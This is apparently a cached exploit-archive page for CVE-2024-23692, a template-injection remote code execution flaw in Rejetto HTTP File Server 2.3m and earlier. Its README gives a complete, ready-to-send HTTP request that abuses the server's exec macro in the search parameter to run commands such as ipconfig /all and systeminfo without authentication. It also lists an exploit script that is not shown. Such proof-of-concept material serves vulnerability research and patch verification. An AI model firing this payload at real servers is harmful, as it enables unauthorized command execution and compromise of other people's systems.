CVE-2024-23692 PoC — Rejetto HTTP File Server 安全漏洞

Source

https://github.com/k3lpi3b4nsh33/CVE-2024-23692

Associated Vulnerability

Title:Rejetto HTTP File Server 安全漏洞 (CVE-2024-23692)
Description:Rejetto HTTP File Server（Rejetto HFS）是Rejetto公司的一款 HTTP 文件服务器。 Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞，该漏洞源于存在模板注入漏洞，允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

Readme

# CVE-2024-23692
BURP POC

```
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1

Host: xxxx

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: close

Cookie: HFS_SID_=0.344328237697482

Upgrade-Insecure-Requests: 1
```

=========================================================

![Snipaste_2024-06-11_15-29-24](https://github.com/k3lpi3b4nsh33/CVE-2024-23692/assets/118002757/4963ae98-224e-463e-a504-812c70a68e53)


COMMAND=systeminfo

You can see that the echo message is around 100 lines of RAW Response

File Snapshot


 [4.0K]  /data/pocs/af20701f2ede0d7ca07441484120c167f6160623
├── [2.9K]  CVE-2024-23692.py
└── [ 817]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!